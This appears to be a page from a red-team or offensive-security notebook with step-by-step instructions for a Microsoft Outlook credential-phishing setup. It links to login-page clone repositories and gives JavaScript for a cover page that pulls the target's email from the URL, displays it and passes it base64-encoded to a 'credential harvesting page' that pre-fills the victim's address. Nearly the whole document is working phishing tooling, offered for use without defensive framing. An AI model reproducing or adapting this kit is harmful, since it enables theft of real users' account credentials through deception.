Phishing
Make sure to check what mailing server target is using first
Outlook Login Pages
https://github.com/Octagon-simon/microsoft-login-clone https://github.com/JoniRinta-
Kahila/microsoft-login-spoof/blob/main/HTML%26JS-only/index.html
Setup Landing Page (Cover Page)
Remove any javascripts
Remove all forms
Add "Welcome , Continue Sign in as"
<span id="gf-user"></span>
where gf user get from email linkAdd to "sign in button" onclick="redirected()"
Add js script
<script>
function onWindowLoad() {
const urlParams = new URLSearchParams(window.location.search);
const email = urlParams.get('email');
const destination = urlParams.get('url');
var xhr = new XMLHttpRequest();
xhr.open('GET', destination, true);
xhr.send();
fetch(destination);
var outputCdc = document.getElementById("gf-user");
outputCdc.innerText=`${email}`;
}
window.onload = onWindowLoad;
function redirected() {
const urlParams = new URLSearchParams(window.location.search);
const destination = urlParams.get('url');
const email = urlParams.get('email');
const emailb = btoa(email);
if (destination) {
window.location.href = destination + "&key=" + emailb;
} else {
window.location.href = 'defaultPage.html';
}
}
</script>
Setup Login Page (Credential Harvesting Page)
Add js script
<script>
window.onload = function() {
const urlParams = new URLSearchParams(window.location.search);
const emailb = urlParams.get('key');
const email = atob(emailb);
const inpele2 = document.getElementById('emailkau');
const inpele3 = document.getElementById('displayName');
inpele2.value = email;
inpele3.textContent = email;
};
</script>
Remember to replace any value with "emailkau" to show email when load
Last updated
Was this helpful?